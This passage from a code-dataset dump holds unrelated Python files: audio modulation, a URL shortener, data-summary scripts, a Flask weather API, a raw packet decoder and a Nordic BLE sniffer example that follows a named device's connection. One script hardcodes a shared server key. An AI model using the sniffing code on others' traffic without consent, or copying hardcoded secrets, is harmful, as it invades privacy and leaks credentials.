3\r\nsd.default.channels = 2\r\nsd.default.samplerate = fs\r\n\r\nprint(\"Gravando\")\r\nsound = sd.rec(int(time0*fs))\r\nsd.wait()\r\nprint(\"Terminou de Gravar\")\r\n\r\nsound = [i[0] for i in sound]\r\n\r\nx = []\r\nfor i in range(len(sound)):\r\n x.append(i)\r\n\r\n#Plot sound\r\nprint(\"Sound - Tempo\")\r\nplt.plot(x, sound)\r\nplt.show()\r\n\r\nprint(\"Sound - FS\")\r\nsinal.plotFFT(sound, fs)\r\nplt.show()\r\n\r\nprint(\"Sound Reproducao\")\r\nsd.play(sound, fs)\r\nsd.wait()\r\n\r\ndef normalize(array):\r\n\r\n max = np.amax(array)\r\n\r\n for i in range(len(array)):\r\n array[i] = array[i]/max\r\n\r\n return array\r\n\r\nsound_norm = normalize(sound)\r\n\r\n#Plot sound_norm\r\nprint(\"Sound_Norm - Tempo\")\r\nplt.plot(x, sound_norm)\r\nplt.show()\r\n\r\nprint(\"Sound_Norm - FS\")\r\nsinal.plotFFT(sound_norm, fs)\r\nplt.show()\r\n\r\ndef filtro(sound_norm, fs):\r\n nyq_rate = fs/2\r\n width = 5.0/nyq_rate\r\n ripple_db = 60.0 #dB\r\n N , beta = 
signal.kaiserord(ripple_db, width)\r\n cutoff_hz = 4000.0\r\n taps = signal.firwin(N, cutoff_hz/nyq_rate, window=('kaiser', beta))\r\n yFiltrado = signal.lfilter(taps, 1.0, sound_norm)\r\n return yFiltrado\r\n\r\nsound_filtrado = filtro(sound_norm, fs)\r\n\r\n#Plot sound_filtrado\r\nprint(\"Sound_Filtrado - Tempo\")\r\nplt.plot(x, sound_filtrado)\r\nplt.show()\r\n\r\nprint(\"Sound_Filtrado - FS\")\r\nsinal.plotFFT(sound_filtrado, fs)\r\nplt.show()\r\n\r\nfreq = 16000\r\namplitude = 1\r\ntime = len(sound_filtrado)/fs\r\n\r\nx1, portador = sinal.generateSin(freq, amplitude, time, fs)\r\n\r\nsound_modulado = portador * sound_filtrado\r\n\r\n#Plot sound_modulado\r\nprint(\"Sound_Modulado - Tempo\")\r\nplt.plot(x, sound_modulado)\r\nplt.show()\r\n\r\nprint(\"Sound_Modulado - FS\")\r\nsinal.plotFFT(sound_modulado, fs)\r\nplt.show()\r\n\r\nprint(\"Sound_Modulado - Reproducao\")\r\nsd.play(sound_modulado, fs)\r\nsd.wait()","repo_name":"ehrhardt98/Camada","sub_path":"P8/Transmit.py","file_name":"Transmit.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36955144042","text":"import pyshorteners\r\n\r\nclass URLShortener:\r\n def __init__(self):\r\n self.shortener = pyshorteners.Shortener()\r\n \r\n def shorten_url(self, original_url):\r\n short_url = self.shortener.tinyurl.short(original_url)\r\n return short_url\r\n \r\n def expand_url(self, short_url):\r\n expanded_url = self.shortener.tinyurl.expand(short_url)\r\n return expanded_url\r\n\r\n# Example usage\r\nshortener = URLShortener()\r\noriginal_url = \"https://www.example.com\"\r\nshort_url = shortener.shorten_url(original_url)\r\nprint(f\"Shortened URL: {short_url}\")\r\nexpanded_url = shortener.expand_url(short_url)\r\nprint(f\"Expanded URL: {expanded_url}\")\r\n","repo_name":"sharath-prabhu-t-m/code-clause","sub_path":"prog1.py","file_name":"prog1.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45666192554","text":"import matplotlib.pyplot as plt\r\nimport json\r\nimport os\r\nimport requests\r\nimport pandas as pd \r\n\r\nclass Filler_Graphic:\r\n\r\n recomendation = \"\"\"Steven D. Cohen, un experto internacionalmente conocido en \r\n comunicación de liderazgo, presencia ejecutiva y oratoria persuasiva, \r\n recomienda que la mejor forma de minimizar el uso de muletillas es realizar \r\n una pausa de silencio. 
Este espacio nos permite pensar y nos hace sonar seguros \r\n y en control, mientras que las muletillas en exceso distraen y le dan al público \r\n una percepción de falta de conocimientos del orador.\"\"\".replace(\"\\n\",\"\")\r\n\r\n\r\n def url_user(self, datos_imagenes, dirpath): #Genera el directorio del grafico para usuario\r\n url_path_user= dirpath + \"/\" + datos_imagenes['resultado_id']\r\n if not os.path.exists(url_path_user):\r\n os.makedirs(url_path_user)\r\n os.makedirs(url_path_user+\"/muletillas\")\r\n return url_path_user\r\n \r\n\r\n def request_server(self, archivos_imagenes, datos_imagenes, url_path_user): #Request para enviar imagen de muletillas\r\n url = 'https://rap.cti.espol.edu.ec/'\r\n datos_muletillas = url_path_user+ '/muletillas/grafico_muletillas.png'\r\n archivos_imagenes['img_0'] = open(datos_muletillas,'rb')\r\n r = requests.post(url + 'resultados/guardar_imagenes/', data=datos_imagenes,files=archivos_imagenes)\r\n print(r)\r\n\r\n\r\n def new_graphic(self, resultado_id, muletillas_json, dirpath):\r\n #dirpath = os.path.dirname(os.path.abspath(__file__))\r\n\r\n #Data para guardar y enviar el grafico\r\n datos_imagenes = {}\r\n archivos_imagenes = {}\r\n\r\n datos_imagenes['clave'] = 'rapIsFun'\r\n datos_imagenes['resultado_id'] = resultado_id\r\n datos_imagenes['num_images'] = 1\r\n datos_imagenes['img_type_0'] = 'f'\r\n datos_imagenes['classifier_0'] = 'filler'\r\n\r\n #Genera el grafico\r\n dictionary = json.load(open(muletillas_json, 'r'))\r\n xAxis = []\r\n yAxis = []\r\n for key, value in dictionary.items():\r\n if(value != 0):\r\n value = value\r\n xAxis.append(key)\r\n yAxis.append(value)\r\n\r\n\r\n df = pd.DataFrame(dict(filler_words=xAxis,count=yAxis))\r\n df_sorted = df.sort_values('count')\r\n fig, ax = plt.subplots(figsize =(8, 5)) \r\n plt.bar('filler_words', 'count',data=df_sorted, color='maroon', width = 0.4)\r\n plt.xlabel('Muletillas')\r\n plt.ylabel('Cantidad de muletillas detectadas en la presentación')\r\n #plt.show()\r\n\r\n user_path= self.url_user(datos_imagenes, dirpath)\r\n plt.savefig(user_path+'/muletillas/grafico_muletillas.png')\r\n #self.request_server(archivos_imagenes, datos_imagenes, user_path)\r\n","repo_name":"hayleencc/graphicsRAP","sub_path":"grafico/grafico_muletillas.py","file_name":"grafico_muletillas.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11682701639","text":"import pandas as pd\nimport json\n\nYEARS = ['2018-19_0','2019-20_0','2020-21_0','2021-22_0','2022-23']\nRAW_FILE_TEMP = 'working\\\\arts_council\\\\National Lottery Project Grants - List of awards in year {}.xlsx'\nSHEET_NAME = 'Project Grants Awards'\n\ndef get_summarys_all():\n summarys = []\n for year in YEARS:\n data = pd.read_excel(RAW_FILE_TEMP.format(year),sheet_name=SHEET_NAME,skiprows=2)\n \n total_count = data['Award amount'].count()\n total_sum = data['Award amount'].sum()\n\n summary = pd.DataFrame({\n 'count' : data.groupby('Local authority')['Award amount'].count(),\n 'sum' : data.groupby('Local authority')['Award amount'].sum()\n })\n\n summary.index.name = 'Local Authority'\n\n #summary['count_per'] = (100 * (summary['count'] / total_count)).round(2)\n #summary['sum_per'] = (100 * (summary['sum'] / total_sum)).round(2)\n summary['year'] = year[:7]\n summarys.append(summary)\n return summarys\n\n \ndata = pd.concat(get_summarys_all())\ndata= data.pivot(columns='year')\n\n\ndata.columns = ['_'.join(col).strip() for col in 
data.columns.values]\ndata['count_total'] = sum([data[col].fillna(0) for col in data.columns if 'count' in col])\ndata['sum_total'] = sum([data[col].fillna(0) for col in data.columns if 'sum' in col])\ndata.to_csv('docs\\\\_data\\\\arts_council\\\\all_summary.csv')\n\ndata['las'] = data.index\nwith open('working\\\\arts_council\\\\la.json') as f:\n hex_data = pd.DataFrame.from_dict(json.load(f)['hexes'],orient='index')\n\ncombined = pd.merge(hex_data,data,left_on='n',right_on='Local Authority',how='left')\ncombined.pop('region')\ncombined = combined.rename(columns={'n':'id'})\n\n#for col in ['count_2018-19','count_2019-20','count_2020-21','count_2021-22','count_2022-23','sum_2018-19','sum_2019-20','sum_2020-21','sum_2021-22','sum_2022-23']:\n# combined[col] = combined[col].astype('Int64')\n# combined[col] = combined[col].fillna(0)\n\ncombined.to_csv('working\\\\arts_council\\\\all_summary_hex.csv',index=False)\nprint(combined)","repo_name":"open-innovations/leeds-2023","sub_path":"scripts/arts_council/process_grants_all.py","file_name":"process_grants_all.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"74948526333","text":"import os, json\n\ndef save_jsonl(outfile, path):\n file_json = open(path, 'r')\n datastore = json.load(file_json)\n json.dump(datastore, outfile)\n outfile.write(\"\\n\")\n\n\npath = './channel_data'\ndirectory = './jsonl_data/'\n\nif not os.path.exists(directory):\n os.mkdir(directory)\n \n# r=root, d=directories, f = files\nprint(\"Montando arquivos...\")\nfor r, d, f in os.walk(path):\n for arq in f:\n if \".json\" in arq and len(d) > 0:\n with open(directory + 'video.jsonl', 'a+') as outfile:\n save_jsonl(outfile, str(r) + \"/\" + str(arq))\n elif \".json\" in arq and not d:\n with open(directory + 'comment.jsonl', 'a+') as outfile:\n save_jsonl(outfile, str(r) + \"/\" + str(arq))\nprint(\"Terminado\")\n","repo_name":"ddrc1/get_youtube_data","sub_path":"script_jsonl.py","file_name":"script_jsonl.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33066017358","text":"from struct import *\n\ndef isiterable(item):\n # checks if the item is iterbale\n try:\n iter(item)\n except TypeError:\n return False\n else:\n return True\n\ndef retrive_mac(mac):\n # takes a the mac address in bytes format. returns a string which represents the mac address.\n # e.g: \\x02\\x10... -> 02:10:...\n assert(type(mac) is bytes)\n \n # making a dict to use to map numbers in dec format to alphabetic or numeric in hex\n d = {i: f'{i}' for i in range(10)}\n for i in range(10, 16):\n d[i] = chr(ord('a') + i - 10)\n\n # making a list of converted hex to decimal values in string format. e.g \\x02\\x10... -> [\"02\", \"10\", ...]\n res = list()\n for item in mac:\n # item is 1 byte in size. break it into two decimal of 4 bits. e.g \\x10 -> 160 -> \"10\"\n if item // 16 > 16:\n raise ValueError('There is a problem with input')\n res.append(str(d[item // 16]) + str(d[item % 16]))\n return \":\".join(res)\n\n\ndef ether(data):\n # gets a packet as input and returns src MAC, dst MAC, protocl number\n \n assert (isiterable(data) and len(data) >= 4)\n\n # 1. src and dst mac\n # first 12 bytes of packet is src and dst add.\n dst_src_mac = unpack(\"!6s 6s\", data[:12]) # tuple of size 2. they are dst and src mac respectively in bytes format.\n\n # making src and dst mac in human readable format. 
eg:\\x10\\x02 -> 10:02\n dst_mac = retrive_mac(dst_src_mac[0])\n src_mac = retrive_mac(dst_src_mac[1])\n\n # 2. protocol number\n proto_num = unpack('!H', data[12:14])[0]\n\n return ({\"Destination MAC\": dst_mac, \"Source MAc\": src_mac, \"Ethertype\": proto_num}, data[14:])\n\n\ndef ip(data):\n # teakes a segment and returns its header values and seperates its ip headers.\n ip_headers = list(unpack('!BBHHHBBHBBBBBBBB', data[:20])) # returns a tuple of different parts of ip header\n\n for i in range(8, len(ip_headers)): # in order to join IPs with '.' they need to be in string format\n ip_headers[i] = str(ip_headers[i])\n\n ip_fields = {\n 'Version': ip_headers[0] // 16, # first byte consists of version and header length each 4 bits\n 'Header length': (ip_headers[0] % 16) * 4,\n 'TOS': ip_headers[1],\n 'Total length': ip_headers[2],\n 'Identifier': ip_headers[3],\n 'Don\\'t fragment': ip_headers[4] // (2 ** 14), # first bit of flags is always 0(reserved). second bit.\n 'More fragments': (ip_headers[4] // 13) & 1, # third bit of flags.\n 'Fragment offset': ip_headers[4] % (2 ** 13), # last 13 bits of flags.\n 'TTL': ip_headers[5],\n 'Protocol number': ip_headers[6],\n 'Header checksum': ip_headers[7],\n 'Source IP address': '.'.join(ip_headers[8:12]), # merging bytes of src and dst ip\n 'Destination IP address': '.'.join(ip_headers[12:])\n }\n\n header_len = ip_fields['Header length']\n if (header_len > 20): # IP header has options\n try:\n ip_fields['Options'] = unpack(f'!{header_len - 20}s', data[20: header_len])\n except:\n # print('HERE')\n # print(header_len)\n # print(len(data))\n # print(len(data[20:header_len]))\n input()\n\n return(ip_fields, data[header_len:])\n\n\ndef icmp(data):\n # decapsulates ICMP packet\n type_, code, ch_sum = unpack('!BBH', data[:4])\n icmp_fields = {\n 'Type': type_,\n 'Code': code,\n 'Checksum': ch_sum,\n 'Rest of header': repr(data[4:]) \n }\n \n return (icmp_fields, None) # because other functions return 2 objects, in order to be match with them returning a none\n\n\ndef arp(data):\n # decapsulates ARP packets.\n hw_type, proto_type, hw_add_len, proto_add_len, opcode = unpack('!HHBBH', data[:8])\n current = 8 # a pointer to byte number of data we are cuurently reading\n \n src_hw = unpack(f'!{hw_add_len}s', data[current : current + hw_add_len])[0] # returns its src hw address in bytes format\n current += hw_add_len\n \n src_proto_add = unpack(f'!{proto_add_len}B', data[current : current + proto_add_len]) # returns a tupel of ip. 
e.g(192, 168, ...)\n current += proto_add_len\n\n\n dst_hw = unpack(f'!{hw_add_len}s', data[current : current + hw_add_len])[0]\n current += hw_add_len\n \n dst_proto_add = unpack(f'!{proto_add_len}B', data[current : current + proto_add_len])\n current += proto_add_len\n\n arp_fields = {\n 'Hardware type': hw_type,\n 'Protocol type': proto_type,\n 'Hardware address length': hw_add_len,\n 'Protocol address length': proto_add_len,\n 'Opcode': opcode,\n 'Source hardware address': retrive_mac(src_hw),\n 'Source protocol address': '.'.join(map(str, src_proto_add)),\n 'Destination hardware address': retrive_mac(dst_hw),\n 'Destination protocol address': '.'.join(map(str, dst_proto_add))\n }\n\n if current < len(data):\n arp_fields['Data'] = repr(data[current])\n\n return (arp_fields, None) # because other functions return 2 objects, in order to be match with them returning a none\n\n\ndef udp(data):\n # decapsulation of UDP packets\n src_port, dst_port, length, checksum = unpack('!4H',data[:8])\n return ({\n 'Source port number': src_port,\n 'Destination port number': dst_port,\n 'Length': length,\n 'CheckSum': checksum\n }, data[8:])\n\ndef tcp(data):\n # decapsulates TCP packets\n src_port, dst_port, seq_num, ack_num, header_len, flags, win_size, checksum, urg_ptr = unpack('!HHIIBBHHH', data[:20])\n current = 20 # a pointer to byte number we are reading\n \n # header length is from bit number 97 to 100 in tcp header but in the line above we got 1 byte in header length (97-104)\n # bit number 104 is nounce flag and bits 101, 102, 103 are reserved and are set to 0\n nounce = header_len % 2\n header_len = (header_len & (15 * 16)) // 16 # taking off those 4 bits\n header_len *= 4 # header length in tcp should be multiplied by 4\n\n tcp_fields = {\n 'Source port number': src_port,\n 'Destination port number': dst_port,\n 'Sequence number': seq_num,\n 'Acknowledgement number': ack_num,\n 'Header length': header_len,\n 'Nounce': nounce\n }\n\n flag_names = ('CWR', 'ECE', 'URG', 'ACK', 'PSH', 'RST', 'SYN', 'FIN')\n for item in reversed(flag_names): # because each time we are getting the last bit names should go from last to first\n tcp_fields[item] = flags % 2\n flags = flags // 2\n\n tcp_fields.update((('Window size', win_size), ('Checksum', checksum), ('Urgent pointer', urg_ptr)))\n\n if header_len > 20: # tcp packet has some optoins\n tcp_fields['Options'] = repr(data[current: header_len])\n current = header_len\n \n return (tcp_fields, data[current:])\n\n\ndef dns(data):\n # decapsulates dns packets\n \n def get_dns_name(data, start):\n # gets dns packet(bytes) and the number of the first bit of name and returns the name\n tmp = data[start]\n direct = True # whether it is a pointer to name or not\n \n current = start\n\n if tmp // 64 == 3: # a pointer to a name\n current = 256 * (data[start] % 64) + data[start + 1]\n direct = False\n \n res = str()\n while data[current] != 0:\n res += chr(data[current])\n current += 1\n \n return (res, current) if direct else (res, start + 1)\n\n def extract_record_dns(data, current, types): \n # is used to extract answer and authority and additional records. 
return new and current position in bytes obj\n name, current = get_dns_name(data, current)\n current += 1\n new = {\n 'Name': name,\n 'Type': unpack('!H', data[current : current + 2])[0],\n 'Class': unpack('!H', data[current + 2 : current + 4])[0],\n 'TTL': unpack('!I', data[current + 4 : current + 8])[0],\n 'Data length': unpack('!H', data[current + 8: current + 10])[0],\n }\n current += 10\n\n new['Type'] = types.get(new['Type'], new['Type']) # specify some common types\n \n # example for below code: CNAME:dns.google.com\n new[new['Type']] = unpack(f'!{new[\"Data length\"]}s',\n data[current : current + new['Data length']])[0]\n\n current += new['Data length']\n\n if new['Type'] == 'A':\n new['A'] = '.'.join(list(map(lambda x: str(x), new['A']))) # human readable IPv4\n\n return new, current\n\n \n \n id_, flags, num_of_quest, num_of_ans, num_of_auth, num_of_add = unpack('!6H', data[:12])\n current = 12 # a ptr to current number of byte\n \n queries = list()\n answers = list()\n authorities = list()\n additionals = list()\n\n types = {1: 'A', 2: 'NS', 5: 'CNAME', 15: 'MX'}\n\n for i in range(num_of_quest): # information of each query\n name, current = get_dns_name(data, current)\n current += 1\n queries.append({\n 'Name': name,\n 'Type': unpack('!H', data[current : current + 2])[0],\n 'Class': unpack('!H', data[current + 2 : current + 4])[0]\n })\n current += 4\n queries[-1]['Type'] = types.get(queries[-1]['Type'], queries[-1]['Type'])\n\n \n for i in range(num_of_ans): # answers\n new_answer, current = extract_record_dns(data, current, types)\n answers.append(new_answer)\n\n\n for i in range(num_of_auth): # authority\n new_authority, current = extract_record_dns(data, current, types)\n authorities.append(new_authority)\n\n\n for i in range(num_of_add):\n new_additional, current = extract_record_dns(data, current, types)\n additionals.append(new_additional)\n \n #id_, flags, num_of_quest, num_of_ans, num_of_auth, num_of_add\n\n dns_info = {\n 'ID': id_,\n 'Response': flags // (2 ** 15), # first bit of flags\n 'Opcode': (flags // (2 ** 11)) & 15, # bit number 2 to 5\n 'Trunced': (flags // (2 ** 9)) & 1, # bit number 7\n 'Recursive': (flags // (2 ** 8)) & 1, # bit number 8\n 'Non-authenticated data': (flags // (2 ** 4)) & 1, # bit number 12\n }\n\n if dns_info['Response']: # adding flags which are related to response dns\n dns_info.update({\n 'Authoritive DNS answer': (flags // (2 ** 10)) & 1, # bit number 6\n 'Recursion available': (flags // (2 ** 7)) & 1, # bit number 9\n 'Ans/Auth was authenticated': (flags // (2 ** 5)) &1, # bit number 11\n 'Status code': flags & 15 # bit number 13-16\n })\n \n dns_info.update({\n 'Questions': num_of_quest,\n 'Answer RR': num_of_ans,\n 'Authority RR': num_of_auth,\n 'Additional RR': num_of_add,\n 'Queries': queries,\n 'Answers': answers,\n 'Authorities': authorities,\n 'Additionals': additionals\n })\n\n return dns_info\n\n\ndef http(data):\n # decapsulating http request and response\n http = data.split(b'\\r\\n\\r\\n')\n if len(http) == 2: # There is both header and message\n header, message = http\n header = list(map(lambda x: x.decode(), header.split(b'\\r\\n')))\n # header = header.split(b'\\r\\n')\n\n elif len(http) == 1: # There is no data or juts headers\n header = http[0]\n message = ''\n try:\n header = list(map(lambda x: x.decode(), header.split(b'\\r\\n')))\n except UnicodeDecodeError: # html code was broken into some parts. 
it's the continue of one of them\n message = http[0]\n header = ''\n # header = header.split(b'\\r\\n')\n else:\n return None\n\n return {'Header': header, 'Message': message}\n\n\n# protocol numbers and ports supported\nip_prot, arp_prot = 2048, 2054\ntcp_prot, udp_prot, icmp_prot = 6, 17, 1\nhttp_prot, dns_prot = 80, 53\n\n\n# mapping supported protocols to their related functions\nlayer_two_porotocols = {ip_prot: ip, arp_prot: arp}\nlayer_three_protocols = {tcp_prot: tcp, udp_prot: udp, icmp_prot: icmp}\nlayer_four_protocols = {http_prot: http, dns_prot: dns}\n\n\ndef extract(packet, start='ETH'):\n # gets the packet and returns all of headers in different layers\n\n # start specifies in which layer to start extracting\n # it is useful when working with sockets. because socket receive functions don't have ethernet headers\n # and in order to extract their headers we have to start from ip layer\n\n headers = dict() # a mapping from protocol names to its headers\n status = False # indicates that can packet be extracted. according to start parameter\n\n if start.upper() == 'ETH':\n status = True\n\n if status:\n head, data = ether(packet)\n headers['Ethernet'] = head\n\n ethtype = head['Ethertype']\n\n if ethtype not in layer_two_porotocols: # unsupported protocol\n return\n \n \n if start.upper() == 'IP':\n ethtype = ip_prot\n data = packet\n status = True\n\n if status: \n head, data = layer_two_porotocols[ethtype](data)\n \n if data is None: # arp\n return {\n 'Ethernet': headers['Ethernet'],\n 'ARP': head\n } \n \n headers['IP'] = head # only supported arp and ip in this layer. it is not arp because it has been checked. so it's ip\n\n if head['Protocol number'] not in layer_three_protocols \\\n or head['Source IP address'].startswith('127'):\n # first condition -> unsupported protocol\n # second condition -> loopback\n return\n\n if head['Protocol number'] == tcp_prot:\n name = 'TCP'\n elif head['Protocol number'] == udp_prot:\n name = 'UDP'\n else:\n name = 'ICMP'\n\n head, data = layer_three_protocols[head['Protocol number']](data)\n\n if data is None: # icmp\n return {\n 'Ethernet': headers['Ethernet'],\n 'IP': headers['IP'],\n 'ICMP': head\n }\n\n headers[name] = head\n \n \n if dns_prot in (head['Source port number'], head['Destination port number']): # storing the name of protocol in order to map this name to its related header in upper layer\n name = 'DNS'\n elif http_prot in (head['Source port number'], head['Destination port number']):\n name = 'HTTP'\n else:\n return # it's not dns and http. 
-> unsupported protocol\n \n\n if head['Source port number'] in layer_four_protocols:\n head = layer_four_protocols[head['Source port number']](data)\n\n elif head['Destination port number'] in layer_four_protocols:\n head = layer_four_protocols[head['Destination port number']](data)\n\n headers[name] = head\n \n return headers\n","repo_name":"sobhansaf/ComputerNetworks-Project","sub_path":"packetExtraction.py","file_name":"packetExtraction.py","file_ext":"py","file_size_in_byte":14797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3423742591","text":"import csv\nfrom flask import Flask, jsonify\nimport numpy as np\nimport pandas as pd\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\n\nmeasurements = []\nstations = []\n\nfile_path = 'Resources/hawaii_measurements.csv'\ninput_file = csv.DictReader(open(file_path))\n\nfor row in input_file:\n measurements.append(row)\n\nfile_path_2 = 'Resources/hawaii_stations.csv'\ninput_file_2 = csv.DictReader(open(file_path_2))\n\nfor row in input_file_2:\n stations.append(row)\n\n\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\nstart_date = dt.datetime(2012, 8, 22)\nend_date = dt.datetime(2014, 8, 22)\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n return (\n f\"Welcome to the Home Page of Hawaii weather data!!!
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation which gives the percipitation on a given date
\"\n f\"/api/v1.0/stations lists all the stations
\"\n f\"/api/v1.0/tobs provides the temperatures from last year
\"\n f\"/api/v1.0/2012.08.22 show the calculate `TMIN`, `TAVG`, and `TMAX` for all dates greater than and equal to the start date
\"\n f\"/api/v1.0/2012.08.22/2014.02.22 is for `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef perc():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \n results = session.query(measurement.date, measurement.prcp).all()\n session.close()\n rain = []\n\n for date, prcp in results:\n rain_dict = {}\n rain_dict['Date'] = date\n rain_dict['Percipitation'] = prcp\n rain.append(rain_dict)\n\n return jsonify(rain)\n\n@app.route(\"/api/v1.0/stations\")\ndef station():\n session = Session(engine)\n\n results = session.query(measurement.station).group_by(measurement.station).all()\n session.close()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n\n session = Session(engine)\n recent_date = dt.datetime(2016, 8, 22)\n results = st_top = session.query(measurement.station, measurement.date, measurement.tobs).\\\n filter(measurement.station=='USC00516128').\\\n filter(measurement.date>recent_date).all()\n session.close() \n\n tobs_station = list(np.ravel(results))\n\n return jsonify(tobs_station)\n\n@app.route(\"/api/v1.0/2012.08.22\")\ndef start():\n session = Session(engine)\n\n \n \n temp_sel = session.query(func.avg(measurement.tobs),\n func.min(measurement.tobs),\n func.max(measurement.tobs)).filter(measurement.date>start_date).all()\n\n the_avg = session.query(func.avg(measurement.tobs).filter(measurement.date>start_date)).all(),\n the_min = session.query(func.min(measurement.tobs).filter(measurement.date>start_date)).all(),\n the_max = session.query(func.max(measurement.tobs)).filter(measurement.date>start_date).all()\n \n session.close()\n\n temp_start = list(np.ravel(temp_sel))\n\n return jsonify(temp_start,\n f\"The max is {the_max}\",\n f\"The min is {the_min}\",\n f\"The avg is {the_avg}\"\n )\n\n@app.route(\"/api/v1.0/2012.08.22/2014.02.22\")\ndef end():\n session = Session(engine)\n\n \n \n temp_sel_2 = session.query(func.avg(measurement.tobs),\n func.min(measurement.tobs),\n func.max(measurement.tobs)).filter(measurement.date>start_date).filter(measurement.datestart_date).filter(measurement.datestart_date).filter(measurement.datestart_date).filter(measurement.date 0:\n # Initialize the sniffer on the first COM port found with baudrate 1000000.\n # If you are using an old firmware version <= 2.0.0, simply remove the baudrate parameter here.\n mySniffer = Sniffer.Sniffer(portnum=ports[0], baudrate=1000000)\n \n else:\n print(\"No sniffers found!\")\n return\n \n # Start the sniffer module. This call is mandatory.\n mySniffer.start()\n # Scan for new advertisers\n mySniffer.scan()\n\n # Wait to allow the sniffer to discover device mySniffer.\n time.sleep(5)\n # Retrieve list of discovered devicemySniffer.\n d = mySniffer.getDevices()\n # Find device with name \"Example\".\n dev = d.find('Example')\n \n if dev is not None:\n # Follow (sniff) device \"Example\". 
This call sends a REQ_FOLLOW command over UART.\n mySniffer.follow(dev)\n else:\n print(\"Could not find device\")\n\ndef loop():\n # Enter main loop\n nLoops = 0\n while True:\n time.sleep(0.1)\n # Get (pop) unprocessed BLE packets.\n packets = mySniffer.getPackets()\n \n processPackets(packets) # function defined below\n \n nLoops += 1\n \n # print diagnostics every so often\n if nLoops % 20 == 0:\n print(mySniffer.getDevices())\n print(\"inConnection\", mySniffer.inConnection)\n print(\"currentConnectRequest\", mySniffer.currentConnectRequest)\n print(\"packetsInLastConnection\", mySniffer.packetsInLastConnection)\n print(\"nPackets\", nPackets)\n print()\n \n# Takes list of packets\ndef processPackets(packets):\n for packet in packets:\n # packet is of type Packet\n # packet.blePacket is of type BlePacket\n global nPackets\n # if packet.OK:\n # Counts number of packets which are not malformed.\n nPackets += 1\n \nsetup()\nif mySniffer is not None:\n loop()\n","repo_name":"zapta/ble_stepper_motor_analyzer","sub_path":"tools/nordic_sniffer/nrf_sniffer_for_bluetooth_le_4.1.1/doc/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"30835189602","text":"import spacy\n# import displacy\nfrom spacy import displacy\nfrom collections import Counter\n\nnlp = spacy.load('en_core_web_sm')\ncomplete_text = ('Gus Proto is a Python developer currently'\n 'working for a London-based Fintech company. He is'\n ' interested in learning Natural Language Processing.'\n ' There is a developer conference happening on 21 July'\n ' 2019 in London. It is titled \"Applications of Natural'\n ' Language Processing\". There is a helpline number '\n ' available at +1-1234567891. Gus is helping organize it.'\n ' He keeps organizing local Python meetups and several'\n ' internal talks at his workplace. Gus is also presenting'\n ' a talk. The talk will introduce the reader about \"Use'\n ' cases of Natural Language Processing in Fintech\".'\n ' Apart from his work, he is very passionate about music.'\n ' Gus is learning to play the Piano. 
He has enrolled '\n ' himself in the weekend batch of Great Piano Academy.'\n ' Great Piano Academy is situated in Mayfair or the City'\n ' of London and has world-class piano instructors.')\n\ncomplete_doc = nlp(complete_text)\n# Remove stop words and punctuation symbols\nwords = [token.text for token in complete_doc\n if not token.is_stop and not token.is_punct]\nword_freq = Counter(words)\n# 5 commonly occurring words with their frequencies\ncommon_words = word_freq.most_common(5)\nprint('common words')\nprint(common_words)\n\n# Iterate over the tokens\nfor token in complete_doc:\n # Print the token and its part-of-speech tag\n print(token.text, \"-->\", token.pos_)\n\ndisplacy.serve(complete_doc, style=\"ent\")\n","repo_name":"jaycedel/TextMiningAssignment2","sub_path":"spacy_parser.py","file_name":"spacy_parser.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72927984892","text":"import itunespy\nimport json\nimport re, json, ast\n\nresult = {}\nresult['video'] = []\n\ndef getVideo(result,search_name):\n videos = itunespy.search(search_name, media='musicVideo')\n data = {}\n data['name'] = []\n data['image'] = []\n data['preview_link'] = []\n data['collection_name'] = []\n data['year'] = []\n data['type'] = []\n temp_name = []\n temp_image = []\n temp_link = []\n temp_collection = []\n temp_year = []\n temp_type = []\n for i in range(len(videos)):\n temp_name.append(videos[i].artist_name)\n temp_image.append(videos[i].artwork_url_100)\n temp_link.append(videos[i].preview_url)\n temp_collection.append(videos[i].track_name)\n temp_year.append(videos[i].release_date[0:10])\n temp_type.append(videos[i].track_type)\n for i in range(len(videos)):\n data = {}\n data['name'] = temp_name[i]\n data['image'] = temp_image[i]\n data['preview_link'] = temp_link[i]\n data['collection_name'] = temp_collection[i]\n data['year'] = temp_year[i]\n data['type'] = temp_type[i]\n result['video'].append(ast.literal_eval(json.dumps(data)))\n\n\n\nif __name__ == '__main__':\n result = {}\n result['video'] = []\n getVideo(result, 'oasis')\n getVideo(result, 'the beatles')\n getVideo(result, 'blake shelton')\n getVideo(result, 'sigur ros')\n getVideo(result, 'queen')\n getVideo(result, 'kanye west')\n\n with open('video_data.json', 'w') as outfile:\n json.dump(result, outfile, 